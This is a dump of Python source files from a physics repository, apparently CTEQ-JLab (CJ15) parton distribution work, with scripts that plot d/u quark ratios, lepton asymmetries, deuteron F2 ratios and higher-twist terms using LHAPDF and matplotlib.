"max_line_length": 70, "num_lines": 103, "path": "/sharespace/codes/d_over_u.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport 
sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom master import COMPOSER,FITPACK\n\ndef plot(fname,ax,Q2,T=1,color='r',hatch='...',edgecolor='k',alpha=1):\n path='../CJ15data/FITS_dquark_series'\n DATA=FITPACK().get_PDFs(path+'/'+fname)\n D=DATA['Q2'][Q2]\n #print D.keys()\n #p1,=ax.plot(D['x'],D['d/u'],color+'-')\n p2=fill_between(D['x'],\n (D['d/u']-D['err-d/u']*T),\n (D['d/u']+D['err-d/u']*T),\n ax=ax,\n facecolor=color,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n #return (p2,p1)\n return p2\n\ndef main():\n\n T=10\n Q2=10.0\n ax=py.subplot(111)\n\n f1='ddat_D.pdf'\n f2='ddat_D_BNS.pdf'\n f3='ddat_D_BNS_Zrap.pdf'\n f4='ddat_D_BNS_Zrap_Lasy.pdf'\n f5='ddat_D_BNS_Zrap_Lasy_WCDF.pdf'\n f6='ddat_D_BNS_Zrap_Lasy_Wasy.pdf'\n g1='ddat_nonuk_D.pdf'\n g2='ddat_nonuk_D_BNS.pdf'\n g3='ddat_nonuk_D_BNS_Zrap.pdf'\n g4='ddat_nonuk_D_BNS_Zrap_Lasy.pdf'\n g5='ddat_nonuk_D_BNS_Zrap_Lasy_WCDF.pdf'\n g6='ddat_nonuk_D_BNS_Zrap_Lasy_Wasy.pdf'\n h1='ddat_noD.pdf'\n\n# plot d/u fig. 1\n pf1=plot(f1,ax,Q2,T,color='y',hatch=None,edgecolor='y',alpha=1.0)\n pf2=plot(f2,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=1.0)\n pf4=plot(f4,ax,Q2,T,color='b',hatch=None,edgecolor='b',alpha=1.0)\n pf6=plot(f6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=1.0)\n\n# plot d/u fig. 2\n #pg6=plot(g6,ax,Q2,T,color='y',hatch='...',edgecolor='y',alpha=0.7)\n #ph1=plot(h1,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=0.5)\n #pf6=plot(f6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=0.7)\n\n# plot d/u fig. ?\n #pf1=plot(g1,ax,Q2,T,color='y',hatch=None,edgecolor='y',alpha=0.5)\n #pf2=plot(g2,ax,Q2,T,color='g',hatch=None,edgecolor='g',alpha=0.5)\n #pf3=plot(g3,ax,Q2,T,color='m',hatch=None,edgecolor='m',alpha=1.0)\n #pf4=plot(g4,ax,Q2,T,color='b',hatch=None,edgecolor='b',alpha=1.0)\n #pf5=plot(g5,ax,Q2,T,color='k',hatch=None,edgecolor='k',alpha=1.0)\n #pf6=plot(g6,ax,Q2,T,color='r',hatch=None,edgecolor='r',alpha=1.0)\n\n\n H,L=[],[]\n# legend fig. 1\n H.append(pf1);L.append(tex('DIS\\ only'))\n H.append(pf2);L.append(tex('+\\ BONuS'))\n H.append(pf4);L.append(r'$+\\ \\ell\\ {\\rm asym}\\ (\\&\\ Z\\ {\\rm rap})$')\n H.append(pf6);L.append(r'$+\\ W\\ {\\rm asym}$')\n\n# legend fig. 2\n #H.append(pg6);L.append(tex('no\\ nuclear'))\n #H.append(ph1);L.append(tex('no\\ deuteron'))\n #H.append(pf6);L.append(tex('CJ15'))\n\n# legend fig. 
?\n #H.append(pf1);L.append(tex('DIS\\ only'))\n #H.append(pf2);L.append(tex('+\\ BONuS'))\n #H.append(pf3);L.append(r'$+\\ Z\\ {\\rm rap})$')\n #H.append(pf4);L.append(r'$+\\ \\ell\\ {\\rm asym}$')\n #H.append(pf5);L.append(r'$+\\ W\\ {\\rm CDF}$')\n #H.append(pf6);L.append(r'$+\\ W\\ {\\rm asym}$')\n\n ax.legend(H,L,loc=1,frameon=0,fontsize=20,bbox_to_anchor=(0.95,1))\n ax.set_ylim(0.0,1.0)\n ax.set_xlim(0.0,0.95)\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel('$d/u$',size=25)\n py.tick_params(axis='both',labelsize=20)\n py.savefig('gallery/du1.pdf')\n\nif __name__=='__main__':\n\n main()\n" }, { "alpha_fraction": 0.542505145072937, "alphanum_fraction": 0.5778234004974365, "avg_line_length": 26.05555534362793, "blob_id": "7511eff10545e56ae783d2eab60e3fa7f346bf59", "content_id": "3ff52f7d87e534b1f99f62d70619c2c71de4a4b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2435, "license_type": "no_license", "max_line_length": 83, "num_lines": 90, "path": "/sharespace/codes/Lasy.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\nclass LASY(object):\n\n def __init__(self):\n self.load_data()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['cdfLasy05'] = DF[DF.ITYPE=='cdfLasy05']\n D['d0Lasy_e15']= DF[DF.ITYPE=='d0Lasy_e15']\n D['d0Lasy13'] = DF[DF.ITYPE=='d0Lasy13']\n self.D=D\n\n def make_plot(self):\n D=self.D\n ax=py.subplot(111)\n\n Y=D['d0Lasy_e15']['Y']\n T=D['d0Lasy_e15']['THEORY']\n ET=D['d0Lasy_e15']['ERROR']\n\n iT= interp1d(Y,T,kind='cubic')\n iET= interp1d(Y,ET, kind='cubic')\n Y=np.linspace(np.amin(Y),np.amax(Y),100)\n\n T=10\n p2=fill_between(Y,iT(Y)-iET(Y)*T,iT(Y)+iET(Y)*T,\n ax=ax,\n facecolor='yellow',\n edgecolor='yellow')\n p1,=ax.plot(Y,iT(Y),'r-')\n H=[(p2,p1)]\n L=[tex('CJ15')]\n\n dmap={}\n dmap['cdfLasy05'] = {'color':'g','marker':'d'}\n dmap['d0Lasy_e15'] = {'color':'b','marker':'o'}\n dmap['d0Lasy13'] = {'color':'c','marker':'^'}\n\n for k in D.keys():\n color=dmap[k]['color']\n marker=dmap[k]['marker']\n markersize=4\n p3=ax.errorbar(D[k]['Y'],D[k]['DATA'],\\\n yerr=D[k]['DERROR'],fmt=color+marker,mfc=color,mec=color,\\\n markersize=markersize,zorder=1,alpha=0.9)\n H.append(p3)\n #L.append(tex(k.replace('_','')))\n L=[tex('CJ15'),tex('CDF')+r'$\\ e$',tex('D\\O')+r'$\\ \\mu$',tex('D\\O')+r'$\\ e$']\n\n ax.set_xlabel(r'$\\eta_{\\ell}$',size=25)\n ax.set_ylabel(r'$A_{\\ell}$',size=25)\n\n ax.legend(H,L,frameon=0,loc=3,fontsize=22,numpoints=1)\n \n ###ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.tick_params(axis='both',labelsize=20)\n py.tight_layout()\n py.savefig('gallery/Lasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n LASY()\n" }, { "alpha_fraction": 0.5405846834182739, "alphanum_fraction": 0.5758615136146545, "avg_line_length": 
28.296649932861328, "blob_id": "2abc837a0b50f72623f6dff6d02f6a289db89c0a", "content_id": "3b6169fb280a55e8d2fea2b2cb46d9dbb1e2a292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6123, "license_type": "no_license", "max_line_length": 86, "num_lines": 209, "path": "/master.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nimport numpy as np\nimport pylab as py\nfrom tools import tex#, fill_between\nimport lhapdf\n\nclass FITPACK(object):\n\n def get_PDFs(self,fname):\n \n # load file into list\n F=open(fname,'r')\n L=F.readlines()\n F.close()\n\n # clean data\n L=[l.strip() for l in L]\n L=[l for l in L if l.startswith('#')==False]\n L=[l for l in L if l.startswith('-')==False]\n L=[l for l in L if l!='']\n\n # get blocks markers\n I=[]\n for i in range(len(L)):\n l=L[i]\n if 'Q2' in l and '=' in l: I.append(i)\n if 'x' in l and '=' in l: I.append(i)\n I.append(len(L))\n\n # get blocks\n BLOCKS=[]\n for k in range(len(I[:-1])):\n block=[]\n for i in range(I[k],I[k+1]):\n block.append(L[i])\n BLOCKS.append(block)\n\n # format blocks\n D={'Q2':{},'x':{}}\n for block in BLOCKS:\n \n key,val = block[0].split('=')\n val=float(val)\n\n H_=block[1].split()\n H=[H_[0]]\n for h in H_[1:]: \n H.append(h)\n H.append('err-'+h)\n\n \n data={}\n data_=block[2:]\n data_=np.transpose([[float(x) for x in l.split()] for l in data_])\n for i in range(len(H)):\n data[H[i]]=data_[i]\n\n D[key][val]=data\n\n return D\n\nclass COMPOSER(object):\n\n def __init__(self,name,X=[None],central_only=False):\n\n self.name=name\n self.central_only=central_only\n if central_only==True:\n self.central=lhapdf.mkPDF(name,0)\n else:\n self.SETS=lhapdf.mkPDFs(name)\n if X[0]==None: self.X=np.linspace(1e-3,0.99,1000)\n else: self.X=X\n\n def map_X(self):\n f=lambda x: x**5\n X=self.X\n m=(X[0]-X[-1])/(f(X[0])-f(X[-1]))\n b=X[0]-m*f(X[0])\n self.X=m*f(X)+b\n\n def _get_xpdf(self,Set,flav,x,Q2):\n if flav=='g': return Set.xfxQ2(21,x,Q2)\n elif flav=='u': return Set.xfxQ2(2,x,Q2)\n elif flav=='d': return Set.xfxQ2(1,x,Q2)\n elif flav=='s': return Set.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return Set.xfxQ2(-2,x,Q2)+Set.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return Set.xfxQ2(-1,x,Q2)-Set.xfxQ2(-2,x,Q2)\n elif flav=='ub': return Set.xfxQ2(-2,x,Q2)\n elif flav=='db': return Set.xfxQ2(-1,x,Q2)\n\n def _get_xpdf_central(self,flav,x,Q2):\n if flav=='g': return self.central.xfxQ2(21,x,Q2)\n elif flav=='u': return self.central.xfxQ2(2,x,Q2)\n elif flav=='d': return self.central.xfxQ2(1,x,Q2)\n elif flav=='s': return self.central.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return self.central.xfxQ2(-2,x,Q2)+self.central.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return self.central.xfxQ2(-1,x,Q2)-self.central.xfxQ2(-2,x,Q2)\n elif flav=='ub': return self.central.xfxQ2(-2,x,Q2)\n elif flav=='db': return self.central.xfxQ2(-1,x,Q2)\n\n def _error(self,message):\n print 'ERR '+message\n sys.exit()\n\n def _get_symmetric_errors(self,OBS):\n n=len(OBS)-1\n feven=np.array([OBS[2*i] for i in range(1,n/2)])\n fodd=np.array([OBS[2*i-1] for i in range(1,n/2)])\n df=np.zeros(feven[0].size)\n for i in range(n/2-1):\n df+=(fodd[i]-feven[i])**2\n return df**0.5/2\n\n def _get_asymmetric_errors(self,OBS):\n n=len(OBS)-1\n f0=np.array(OBS[0])\n feven=np.array([OBS[2*i] for i in range(1,n/2)])\n fodd=np.array([OBS[2*i-1] for i in range(1,n/2)])\n dfeven=feven-f0\n dfodd=fodd-f0\n zeros=np.zeros(f0.size)\n dfP=np.zeros(f0.size)\n dfM=np.zeros(f0.size)\n for i in 
range(n/2-1):\n dfP+=np.amax([dfodd[i],dfeven[i],zeros],0)**2\n dfM+=np.amax([-dfodd[i],-dfeven[i],zeros],0)**2\n return dfP**0.5,dfM**0.5\n\n def get_xpdf(self,flav=None,X=None,Q2=None):\n if flav==None: self._error('specify flav')\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n if self.central_only:\n D['xf0']=np.array([self._get_xpdf_central(flav,x,Q2) for x in X])\n D['dxf']=np.zeros(X.size)\n D['dxf+']=np.zeros(X.size)\n D['dxf-']=np.zeros(X.size)\n else:\n PDFS=[[self._get_xpdf(Set,flav,x,Q2) for x in X] for Set in self.SETS]\n D['xf0']=np.array(PDFS[0])\n D['dxf']=self._get_symmetric_errors(PDFS)\n D['dxf+'],D['dxf-']=self._get_asymmetric_errors(PDFS)\n return D\n\n def get_dou(self,X=None,Q2=None):\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n d=lambda Set,x,Q2: self._get_xpdf(Set,'d',x,Q2) \n u=lambda Set,x,Q2: self._get_xpdf(Set,'u',x,Q2) \n OBS=[[d(Set,x,Q2)/u(Set,x,Q2) for x in X] for Set in self.SETS]\n D['central']=np.array(OBS[0])\n D['sym err']=self._get_symmetric_errors(OBS)\n D['asym err +'],D['asym err -']=self._get_asymmetric_errors(OBS)\n return D\n\nclass COMPOSER4NNPDF(object):\n\n def __init__(self,name):\n\n self.name=name\n self.SETS=lhapdf.mkPDFs(name)\n\n def _get_xpdf(self,Set,flav,x,Q2):\n if flav=='g': return Set.xfxQ2(21,x,Q2)\n elif flav=='u': return Set.xfxQ2(2,x,Q2)\n elif flav=='d': return Set.xfxQ2(1,x,Q2)\n elif flav=='s': return Set.xfxQ2(3,x,Q2)\n elif flav=='db+ub': return Set.xfxQ2(-2,x,Q2)+Set.xfxQ2(-1,x,Q2)\n elif flav=='db-ub': return Set.xfxQ2(-1,x,Q2)-Set.xfxQ2(-2,x,Q2)\n elif flav=='ub': return Set.xfxQ2(-2,x,Q2)\n elif flav=='db': return Set.xfxQ2(-1,x,Q2)\n\n def _error(self,message):\n print 'ERR '+message\n sys.exit()\n\n def get_xpdf(self,flav=None,X=None,Q2=None):\n if flav==None: self._error('specify flav')\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n PDFS=[[self._get_xpdf(Set,flav,x,Q2) for x in X] for Set in self.SETS]\n D['xf0']=np.mean(PDFS,axis=0)\n D['dxf+']=np.var(PDFS,axis=0)**0.5\n D['dxf-']=np.var(PDFS,axis=0)**0.5\n return D\n\n def get_dou(self,X=None,Q2=None):\n if X==None: X=self.X\n if Q2==None: self._error('specify Q2')\n D={}\n d=lambda Set,x,Q2: self._get_xpdf(Set,'d',x,Q2) \n u=lambda Set,x,Q2: self._get_xpdf(Set,'u',x,Q2) \n OBS=[[d(Set,x,Q2)/u(Set,x,Q2) for x in X] for Set in self.SETS]\n D['central']=np.mean(OBS,axis=0)\n D['asym err +']=np.var(OBS,axis=0)**0.5\n D['asym err -']=np.var(OBS,axis=0)**0.5\n return D\n\n\nif __name__==\"__main__\" :\n\n CJ=COMPOSER(name='CJ12min')\n CJ.map_X() # optional\n print CJ.get_xpdf('g',Q2=10.0)\n" }, { "alpha_fraction": 0.6549450755119324, "alphanum_fraction": 0.6813187003135681, "avg_line_length": 23.781818389892578, "blob_id": "8849f8a843cae991282550bf0a2a7c1ecff2f6d4", "content_id": "1e4a802b4940d71a4c5a330463755a9b2a506dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1365, "license_type": "no_license", "max_line_length": 91, "num_lines": 55, "path": "/sharespace/codes/other/advanced.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport lhapdf\nfrom tools import tex, fill_between\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK, COMPOSER\n \n# define x 
values\nX=np.linspace(1e-3,0.9,1000)\n\n# initialize composer\nCJ=COMPOSER(name='CJ12min',X=X)\n#CJ.map_X() # optional\n\n# get glue \n# note: the output is a dictionary where\n# key='f0' -> central PDF\n# key='df' -> symmetric error\n# key='df+' -> asymmetric error (+)\n# key='df0' -> asymmetric error (-)\nu=CJ.get_xpdf(flav='u',Q2=10.0)\nprint u.keys()\n\n\n# these lines add latex typefont.\n# is kind of slow, so uncomment while a plot is been coded\n#from matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n#rc('text', usetex=True) \n\n# create matplotlib instance\nax=py.subplot(111)\n\n# plot error band\nT=10.0\nUP=u['f0']+T*u['df+']\nDO=u['f0']-T*u['df-']\nfill_between(X,DO,UP,ax=ax,label=tex('u'),facecolor='r',edgecolor='r',alpha=0.5,hatch=None)\n\n# plot central\nax.plot(X,u['f0'],'r-',label=tex('u'))\n\n# makeup\nax.legend(loc=3,frameon=0,fontsize=20)\nax.semilogx()\nax.set_xlabel(tex('x'),size=20)\nax.set_ylabel(tex('xPDF(x)'),size=20)\npy.tight_layout()\npy.savefig('plots/advanced.pdf')\n\n\n" }, { "alpha_fraction": 0.5781383514404297, "alphanum_fraction": 0.6020495295524597, "avg_line_length": 17.03125, "blob_id": "1257acae9bd295d3be43e3fe88b40e1654b8df0f", "content_id": "a8af287211318d86b724e8086e91ee256a557d13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 54, "num_lines": 64, "path": "/sharespace/codes/other/fitpack_data.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nfrom master import FITPACK\n\n\nfitpack=FITPACK()\n\ndata=fitpack.get_PDFs('CDBONN_KP_1_LO_6.pdf')\n\n\n\n#import numpy as np\n#import pylab as py\n#\n## define filepath\n#path='/u/group/cteqX/wmelnitc/fits/CJ15'\n#fname='CDBONN_KP_1_LO_6.pdf'\n#\n## load file into list L\n#F=open(fname,'r')\n#L=F.readlines()\n#F.close()\n#\n## isolate Q2=10.0 data\n#TL=[]\n#flag=False\n#for l in L:\n# if 'Q2=' in l and '10.00' in l: flag=True\n# if 'Q2=' in l and '25.00' in l: flag=False\n# if flag==True:\n# TL.append(l) \n#L=TL\n#\n## remove spaces, newlines etc\n#L=[l.strip() for l in L]\n## split each line separated by spaces\n#L=[l.split() for l in L]\n## rm empty lists\n#L=[l for l in L if l!=[]]\n#\n## get headers\n#H=L[1]\n#\n## get matrix of data\n#data=L[2:]\n#data=[[float(x) for x in l] for l in data ]\n#data=np.array(data)\n#data=np.transpose(data)\n## data = [[values of 'X'],[ values of 'xu'],...] 
\n#\n## construct dictionary\n#D={}\n#for i in range(len(H)):\n# D[H[i]] = data[i]\n#\n##print D.keys()\n##print D['xg']\n#\n#\n#ax=py.subplot(111)\n#ax.errorbar(D['X'],D['xu'],yerr=10*D['Dxu'],fmt='k.')\n#py.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6015995740890503, "alphanum_fraction": 0.6238440275192261, "avg_line_length": 25.065359115600586, "blob_id": "a625f5ed0717e6ee052498c18887163471828a1d", "content_id": "ed1be50a8c0ca05d31292603c486fffd07e618e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4001, "license_type": "no_license", "max_line_length": 72, "num_lines": 153, "path": "/sharespace/codes/other/loglin.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nimport numpy as np\nimport time\nimport fnmatch\nimport cPickle \nfrom operator import mul\nimport pylab as py\nimport matplotlib.patches as mpatches\n#from line_profiler import LineProfiler\n\ndef tex(x):\n return r'$\\mathrm{'+x+'}$'\n\ndef add_subplot_axes(ax,rect,axisbg='w'):\n fig = py.gcf()\n box = ax.get_position()\n width = box.width\n height = box.height\n inax_position = ax.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3] # <= Typo was here\n subax = fig.add_axes([x,y,width,height],axisbg=axisbg)\n x_labelsize = subax.get_xticklabels()[0].get_size()\n y_labelsize = subax.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2]**0.5\n y_labelsize *= rect[3]**0.5\n subax.xaxis.set_tick_params(labelsize=x_labelsize)\n subax.yaxis.set_tick_params(labelsize=y_labelsize)\n return subax\n\nclass SPLIT_AX(object):\n\n def __init__(self,ax):\n self.ax=ax\n self.get_LR(ax)\n self.is_ylim_set=False\n\n def get_LR(self,ax,xlabel='x-label',ylabel='y-label'):\n\n ax.axis('off')\n axisbg='w'\n \n fig = py.gcf()\n box = ax.get_position()\n transFigure = fig.transFigure.inverted()\n width = box.width/2\n height = box.height\n \n # create axL\n inax_position = ax.transAxes.transform([0,0])\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n axL = fig.add_axes([x,y,width,height],axisbg=axisbg)\n axL.spines['right'].set_visible(False)\n axL.get_yaxis().tick_left()\n \n # create axR\n inax_position = ax.transAxes.transform([0.5,0])\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n axR = fig.add_axes([x,y,width,height],axisbg=axisbg)\n axR.get_yaxis().tick_left()\n axR.spines['left'].set_visible(False)\n axR.axes.yaxis.set_ticklabels([])\n axR.axes.get_yaxis().set_ticks([])\n \n self.axL=axL\n self.axR=axR\n\n def plot(self,X,Y,*args,**kwargs):\n\n # break the arrays for L&R\n I=-1\n for i in range(len(X)):\n if X[i]>=0.1: \n I=i\n break\n XL,YL=X[:I+1],Y[:I+1]\n XR,YR=X[I:],Y[I:]\n\n # plot arrays\n self.axR.plot(XR,YR,*args,**kwargs)\n self.axL.plot(XL,YL,*args,**kwargs) \n\n # set y-limits\n y1=np.amin(Y)\n y2=np.amax(Y)\n\n if self.is_ylim_set==False:\n self.y1_=y1\n self.y2_=y2\n self.is_ylim_set=True\n else:\n self.y1_=np.amin([y1,self.y1_])\n self.y2_=np.amax([y2,self.y2_])\n\n self.axL.set_ylim(self.y1_,self.y2_)\n self.axR.set_ylim(self.y1_,self.y2_)\n\n # set x-limits\n self.axL.set_xlim(XL[0],0.1)\n self.axR.set_xlim(0.1,XR[-1])\n\n self.axR.set_xticks([0.3,0.5,0.7,0.9])\n self.axL.semilogx()\n\n def 
set_ylabel(self,text,displace=-0.15,**kwargs):\n self.axL.set_ylabel(text)\n self.axL.yaxis.set_label_coords(displace,0.5)\n\n def set_xlabel(self,text,displace=-0.1,**kwargs):\n self.axL.set_xlabel(text)\n self.axL.xaxis.set_label_coords(1.0,displace)\n\n def tick_params(self,*args,**kwargs):\n self.axL.tick_params(*args,**kwargs)\n self.axR.tick_params(*args,**kwargs)\n\n def set_title(self,*args,**kwargs):\n self.axL.set_title(*args,**kwargs)\n\n def legend(self,*args,**kwargs):\n if any([k=='loc' for k in kwargs.keys()]):\n if kwargs['loc']==1 or kwargs['loc']==4: self.axR.legend(**kwargs)\n if kwargs['loc']==2 or kwargs['loc']==3: self.axL.legend(**kwargs)\n else:\n self.axR.legend(**kwargs)\n\n def set_ylim(self,*args):\n self.axL.set_ylim(*args)\n self.axR.set_ylim(*args)\n\n def axhline(self,**kwargs):\n self.axL.axhline(**kwargs)\n self.axR.axhline(**kwargs)\n\n\nif __name__==\"__main__\":\n\n ax=py.subplot(111)\n SA=SPLIT_AX(ax)\n X=10**np.linspace(-5,-1,100)\n X=np.append(X,np.linspace(0.1,1,100))\n Y=X*(1-X)\n SA.plot(X,Y)\n py.savefig('plot.pdf')\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4745098054409027, "alphanum_fraction": 0.5715686082839966, "avg_line_length": 28.14285659790039, "blob_id": "ec4f0442b8b3ca73d0f1f461546c7e495f0d53d8", "content_id": "0b76f40ec670ffeed6fa67bd767d975555a864b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1020, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/sharespace/codes/ht.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\n\nD={}\nD['AV18'] ={'h':[-3.0094,1.7526,-2.0895] ,'c':'r','ls':'-'} \nD['CDBonn']={'h':[-2.9851,1.7564,-2.0856] ,'c':'g','ls':'--'}\nD['WJC1'] ={'h':[-3.2169,1.8225,-2.0844],'c':'k','ls':'-.'}\nD['WJC2'] ={'h':[-3.0403,1.7605,-2.0898] ,'c':'b','ls':':'}\n\nf=lambda x,h: h[0] * x**h[1] * (1+h[2]*x)\nX=np.linspace(0,1,100)\nax=py.subplot(111)\nfor k in ['AV18','CDBonn','WJC1','WJC2']:\n ax.plot(X,f(X,D[k]['h']),\\\n color=D[k]['c'],\\\n lw=2.0,\\\n ls=D[k]['ls'],\\\n label=tex(k)\n )\nax.set_ylim(-0.5,2)\nax.set_ylabel(r'$C_{\\rm HT}$',size=30)\nax.set_xlabel('$x$',size=30)\nax.axhline(0,color='k',ls='-',alpha=0.2)\nax.legend(frameon=0,loc=2,fontsize=25)\npy.tick_params(axis='both',labelsize=25)\npy.tight_layout()\npy.savefig('gallery/ht.pdf')\n" }, { "alpha_fraction": 0.49593496322631836, "alphanum_fraction": 0.5394132137298584, "avg_line_length": 25.19444465637207, "blob_id": "7d265f787c0989b187dfb3dfb44377cdbc41f290", "content_id": "7201d0b34c9e096cbb690c0dd730e2c7af2d4f05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2829, "license_type": "no_license", "max_line_length": 86, "num_lines": 108, "path": "/sharespace/codes/F2d_F2.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\n\nclass 
F2ratio(object):\n\n def __init__(self):\n self.load_data()\n self.make_plotI()\n self.make_plotII()\n\n def _load_data(self,name):\n D=self.D\n F=open('../CJ15data/FITS_150701_LO_NLO/calc_NLO_KP_'+name+'.out')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n data=[l.replace('*','').split() for l in L if 'test_DN' in l if len(l.split())<25]\n for l in L:\n if all([k in l for k in ['X','Q2','W2','THEORY']]):\n H=l.replace('_w','').replace(r'chi^2','').split()\n DF=pd.DataFrame(data,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n D[name]=DF\n\n def load_data(self):\n self.D={}\n self._load_data('AV18')\n self._load_data('CDBONN')\n self._load_data('WJC1')\n self._load_data('WJC2')\n\n def make_plotI(self):\n # retrieve data\n D=self.D\n\n kmap={}\n kmap['AV18'] = {'c':'r','ls':'-'}\n kmap['CDBONN'] = {'c':'g','ls':'--'}\n kmap['WJC1'] = {'c':'k','ls':'-.'}\n kmap['WJC2'] = {'c':'b','ls':':'}\n\n ax=py.subplot(111)\n for k in ['AV18','CDBONN','WJC1','WJC2']:\n DF=D[k]\n DF=DF[DF.Q2==10]\n if k=='CDBONN':\n label='CDBonn'\n else:\n label=k\n cls=kmap[k]['c']+kmap[k]['ls']\n ax.plot(DF.X,DF.THEORY,cls,lw=2.0,label=tex(label))\n\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel(r'$F_2^d\\, /\\, F_2^N$',size=25)\n ax.set_ylim(0.97,1.08)\n ax.axhline(1,color='k',ls='-',alpha=0.2)\n\n ax.legend(frameon=0,loc=2,fontsize=22)\n py.tick_params(axis='both',labelsize=22)\n py.tight_layout()\n py.savefig('gallery/F2d_F2_I.pdf')\n py.close()\n\n def make_plotII(self):\n # retrieve data\n D=self.D\n\n kmap={}\n kmap['Q2 = 2'] = {'c':'r','ls':'-'}\n kmap['Q2 = 5'] = {'c':'g','ls':'--'}\n kmap['Q2 = 10'] = {'c':'b','ls':'-.'}\n kmap['Q2 = 100'] = {'c':'k','ls':':'}\n\n\n ax=py.subplot(111)\n DF=D['AV18']\n for Q2 in [2,5,10,100]:\n k='Q2 = %d'%Q2\n Q2=float(k.split('=')[1])\n DF=D['AV18'][D['AV18'].Q2==Q2]\n cls=kmap[k]['c']+kmap[k]['ls']\n ax.plot(DF.X,DF.THEORY,cls,lw=2.0,label=r'$Q^2=%0.0f~{\\rm GeV}^2$'%Q2)\n\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel(r'$F_2^d\\, /\\, F_2^N$',size=25)\n ax.set_ylim(0.97,1.08)\n ax.axhline(1,color='k',ls='-',alpha=0.2)\n\n ax.legend(frameon=0,loc=2,fontsize=22)\n py.tick_params(axis='both',labelsize=22)\n py.tight_layout()\n py.savefig('gallery/F2d_F2_II.pdf')\n\nif __name__=='__main__':\n\n F2ratio()\n" }, { "alpha_fraction": 